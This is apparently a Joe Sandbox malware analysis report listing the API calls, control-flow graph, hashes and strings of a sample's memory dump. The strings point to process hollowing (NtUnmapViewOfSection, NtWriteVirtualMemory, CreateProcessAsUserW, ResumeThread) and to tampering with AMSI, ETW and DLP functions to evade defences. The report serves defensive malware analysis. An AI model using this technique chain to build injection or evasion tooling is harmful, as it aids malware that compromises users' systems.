                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                    • API String ID: 2719805696-3542721025
                                                                                                                    • Opcode ID: 947bd184eb53674891031d9f3986e4e1447978ea186527d4c91bee0d0a478891
                                                                                                                    • Instruction ID: 49a72e7b5540e5bcfcc8040acacb80648557f96a9136dbbf4b55c8118be86aef
                                                                                                                    • Opcode Fuzzy Hash: 947bd184eb53674891031d9f3986e4e1447978ea186527d4c91bee0d0a478891
                                                                                                                    • Instruction Fuzzy Hash: C4010C75680209AFEB00EF99EC61E9EB7EDEB49B00F504860B905D7740D730AE558B75
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                    • API String ID: 3503870465-2520021413
                                                                                                                    • Opcode ID: a41f931500c5b311a91cd73a7275f448490c16c449061043b6994669820a8c4b
                                                                                                                    • Instruction ID: 1157c801880c65b5ae39d9351d41c5da500507091cadba275caa1e8b74b13800
                                                                                                                    • Opcode Fuzzy Hash: a41f931500c5b311a91cd73a7275f448490c16c449061043b6994669820a8c4b
                                                                                                                    • Instruction Fuzzy Hash: 32016274A80204AFEB00EFA5EC61E5EB7EEEB49B00F914464B800D7740D634AD41DA24
                                                                                                                    APIs
                                                                                                                    • RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$DeleteFileNameName_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4284456518-0
                                                                                                                    • Opcode ID: c3092f177f96d71ba03943f11c79aa84a9dc0bbb1f4a0c5d7f3dc7a431d26d62
                                                                                                                    • Instruction ID: c7125f0cf80e9e53527e046b63a4a916c7db70d8dc4e2b589d7f334b8da42dcf
                                                                                                                    • Opcode Fuzzy Hash: c3092f177f96d71ba03943f11c79aa84a9dc0bbb1f4a0c5d7f3dc7a431d26d62
                                                                                                                    • Instruction Fuzzy Hash: FB016275A452086EEB05EBA09D51FCD77BAEB48704F514492A240E6681DAB4AF048B35
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02D94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D94F2E
                                                                                                                    • RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61
                                                                                                                      • Part of subcall function 02D94C60: SysFreeString.OLEAUT32(02DAF4A4), ref: 02D94C6E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1530111750-0
                                                                                                                    • Opcode ID: e29b248b4e59c2e7736f8974df1b48670d19100bfcfa5d576e6aca837a3dca7e
                                                                                                                    • Instruction ID: 974771b1f4400862f678687f2f09bcc056b370d5cb993d40cabc9c09bfabef16
                                                                                                                    • Opcode Fuzzy Hash: e29b248b4e59c2e7736f8974df1b48670d19100bfcfa5d576e6aca837a3dca7e
                                                                                                                    • Instruction Fuzzy Hash: 1F01F47694020CBEDB11EBA0DD52FCDB3BEEB48704F5144A1E601E2680EB746F048A74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02DA6DB9,?,?,?,00000000), ref: 02DA6D99
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02DA6EAC,00000000,00000000,02DA6E2B,?,00000000,02DA6E9B), ref: 02DA6E17
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2151042543-0
                                                                                                                    • Opcode ID: 6d18d6d20e23981490234127c33ca87c98ec7eedfdddbe981c3c18bdedfddd63
                                                                                                                    • Instruction ID: 466a54afb0c2db95104bcc17bb2554e0a5834d53fa50d8aa34b71c4dc170be5e
                                                                                                                    • Opcode Fuzzy Hash: 6d18d6d20e23981490234127c33ca87c98ec7eedfdddbe981c3c18bdedfddd63
                                                                                                                    • Instruction Fuzzy Hash: 3501DFB1208704AEEF11EF61EC32C6BBBADE749B00F514835F505E2780E671DE0088B0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 4574 2db8128-2db8517 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d948ec 4689 2db851d-2db86f0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d947ec call 2d949a0 call 2d94d74 call 2d94df0 CreateProcessAsUserW 4574->4689 4690 2db93a1-2db9524 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d948ec 4574->4690 4799 2db876e-2db8879 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 4689->4799 4800 2db86f2-2db8769 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 4689->4800 4780 2db952a-2db9539 call 2d948ec 4690->4780 4781 2db9cf5-2dbb2fa call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 * 16 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2d946d4 * 2 call 2da89d0 call 2da7c10 call 2da8338 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 ExitProcess 4690->4781 4780->4781 4788 2db953f-2db9812 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2daf094 call 2d94860 call 2d949a0 call 2d946d4 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d97e5c 4780->4788 5046 2db9818-2db9aea call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2dae358 call 2d94530 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94de0 * 2 call 2d94764 call 2dadc8c 4788->5046 5047 2db9aef-2db9cf0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d949f8 call 2da8d70 4788->5047 4900 2db887b-2db887e 4799->4900 4901 2db8880-2db8ba0 call 2d949f8 call 2dade50 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2dad164 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 4799->4901 4800->4799 4900->4901 5214 2db8bb9-2db939c call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 ResumeThread call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 CloseHandle call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2da8080 call 2da894c * 6 CloseHandle call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 4901->5214 5215 2db8ba2-2db8bb4 call 2da8730 4901->5215 5046->5047 5047->4781 5214->4690 5215->5214
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F0B7E0,02F0B824,OpenSession,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB86E9
                                                                                                                    • ResumeThread.KERNEL32(00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8), ref: 02DB8D33
                                                                                                                    • CloseHandle.KERNEL32(00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,00000000,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380), ref: 02DB8EB2
                                                                                                                      • Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
                                                                                                                      • Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
                                                                                                                      • Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E17380,02DBB7B8,UacInitialize,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB92A4
                                                                                                                      • Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67
                                                                                                                      • Part of subcall function 02DADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
                                                                                                                      • Part of subcall function 02DADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
                                                                                                                      • Part of subcall function 02DADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
                                                                                                                      • Part of subcall function 02DADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B
                                                                                                                      • Part of subcall function 02DA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4
                                                                                                                    • ExitProcess.KERNEL32(00000000,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,Initialize,02E17380,02DBB7B8,00000000,00000000,00000000,ScanString,02E17380,02DBB7B8), ref: 02DBB2FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                    • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                    • API String ID: 2769005614-3738268246
                                                                                                                    • Opcode ID: c05b1bf2c0c4928d371fdd775e36fc0887a7056a8f4695a6c8026ac495392b63
                                                                                                                    • Instruction ID: 8f77da6e155d744b8134e1c6acc4e166267ae7c6c86e5aa2bcdbf9ea6a3033d7
                                                                                                                    • Opcode Fuzzy Hash: c05b1bf2c0c4928d371fdd775e36fc0887a7056a8f4695a6c8026ac495392b63
                                                                                                                    • Instruction Fuzzy Hash: D143EA75A0015CDFDF21EB64DC909CE73BAFF89304F5041E6A40AAB715DA30AE968F61
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                      • Part of subcall function 02DADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADD5E), ref: 02DADCCB
                                                                                                                      • Part of subcall function 02DADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DADD05
                                                                                                                      • Part of subcall function 02DADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DADD32
